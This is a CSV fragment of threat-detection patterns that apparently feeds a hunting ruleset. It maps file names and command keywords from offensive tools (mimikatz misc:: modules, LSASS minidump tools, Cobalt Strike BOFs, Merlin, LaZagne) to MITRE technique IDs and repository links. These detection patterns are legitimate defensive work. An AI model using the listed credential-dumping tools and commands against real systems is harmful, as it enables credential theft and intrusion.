"*MimiPenguin.json*",".{0,1000}MimiPenguin\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*mimipenguin.so*",".{0,1000}mimipenguin\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipenguin_x32.so*",".{0,1000}mimipenguin_x32\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipy.py*",".{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*mimiRatz*",".{0,1000}mimiRatz.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*mimishim.*",".{0,1000}mimishim\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimispool.dll*",".{0,1000}mimispool\.dll.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*MimiTickets\*-Tickets.txt*",".{0,1000}MimiTickets\\.{0,1000}\-Tickets\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*minidump*minikerberos*",".{0,1000}minidump.{0,1000}minikerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*minidump.* lsass.dmp*",".{0,1000}minidump\..{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*Minidump.exe*",".{0,1000}Minidump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*minidump.exe*",".{0,1000}minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*Minidump.sln*",".{0,1000}Minidump\.sln.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*minidump_add_memory_block*",".{0,1000}minidump_add_memory_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*minidump_add_memory64_block*",".{0,1000}minidump_add_memory64_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*minidumptomemsharp.lsa.lsaproviderduper.boo*",".{0,1000}minidumptomemsharp\.lsa\.lsaproviderduper\.boo.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*minidumpwritedump*",".{0,1000}minidumpwritedump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*MiniDumpWriteDump*",".{0,1000}MiniDumpWriteDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*minikerberos.zip*",".{0,1000}minikerberos\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*mirrors.aliyun.com/parrot*",".{0,1000}mirrors\.aliyun\.com\/parrot.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*misc::aadcookie*",".{0,1000}misc\:\:aadcookie.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::clip*",".{0,1000}misc\:\:clip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::cmd*",".{0,1000}misc\:\:cmd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::compress*",".{0,1000}misc\:\:compress.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::detours*",".{0,1000}misc\:\:detours.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::efs*",".{0,1000}misc\:\:efs.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::lock*",".{0,1000}misc\:\:lock.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::memssp*",".{0,1000}misc\:\:memssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::mflt*",".{0,1000}misc\:\:mflt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::ncroutemon*",".{0,1000}misc\:\:ncroutemon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::ngcsign*",".{0,1000}misc\:\:ngcsign.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::regedit*",".{0,1000}misc\:\:regedit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::sccm*",".{0,1000}misc\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - 